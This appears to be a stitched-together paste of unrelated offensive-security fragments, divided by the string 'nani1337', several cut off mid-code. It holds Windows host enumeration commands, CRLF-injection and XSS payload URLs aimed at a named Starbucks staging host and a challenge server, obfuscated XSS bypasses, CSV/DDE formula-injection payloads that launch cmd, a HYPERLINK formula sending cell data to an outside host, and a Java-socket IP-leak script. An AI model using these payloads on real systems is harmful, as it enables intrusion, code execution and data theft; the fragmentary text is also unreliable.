nani1337

What is the OS and architecture? Is it missing any patches?

systeminfo
wmic qfe
Is there anything interesting in environment variables? A domain controller in LOGONSERVER?

set
Get-ChildItem Env: | ft Key,Value
Are there any other connected drives?

nani1337

		|=--------------------------------------------------------------------=|
		|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
		|=-------------------------=[ 6 October 2011 ]=-----------------------=|
		|=----------------------=[  By CWH Underground  ]=--------------------=|
		|=--------------------------------------------------------------------=|
				

######
 Info
######

nani1337

###############
# Permissions #
###############
---------------------------Type This-----------------------------------
cd ~
 
pwd
 
ls
 

nani1337

import requests
import re
import sys
from multiprocessing.dummy import Pool


def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
        ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

nani1337

http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E


http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E

nani1337

http://185.45.192.228/xssChall/3.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es

http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Efor((i)in(self))eval(i)(1)%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=%27%3E%3Cscript%3Eeval(atob(%22cHJvbXB0KDEpOw==%22))%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Eeval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3EparseInt(%22prompt%22,36);%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\141\154\145\162\164(1)%22)();%3C/script%3Es
http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es

nani1337

The full name of JSONP is JSON with Padding, a solution based on the JSON format that solves cross-domain request resources. He achieved the basic principle is the use of the HTML <script></script>element tags, remote call JSON files to achieve data transfer. To get b.com's JSON data (getUsers.JSON) under the a.com domain:

{"id" : "1","name" : "知道创宇"}
Then they can first output via JSONP's "Padding" getUsers.JSON as:

callback({"id" : "1","name" : "知道创宇"}); 
Callback for the actual application of the name in the background is dynamically output. As in the above example in PHP:

<?php
//getUsers.php

nani1337

=cmd|' /C calc'!A0
=cmd|'/k ipconfig'!A0
=HYPERLINK("http://linux.im?test="&A2&A3,"Error: Please click me!")
=cmd|' /C notepad'!'A1
=cmd|'/C ping -t 127.0.0.1 -l 25152'!'A1'

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
;=2+5+cmd|' /C calc'!A0

nani1337

var sock = new java.net.Socket();
sock.bind(new java.net.InetSoscketAddress('0.0.0.0',0));
sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));
alert(sock.getLocalAddress().getHostAddress());

nani1337

<img src=x onerror=%character%alert(1)>

Firefox 3.0.8:
8,9,10,11,12,13,32,34,59,160,8192,8193,8194,8195,8196,8197,8198,8199,
8200,8201,8202,8203,8232,8233,12288,65279,65534

Opera 10.01:
9,10,11,12,13,32,59,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,
8200,8201,8202,8203,8232,8233,8239,12288,65279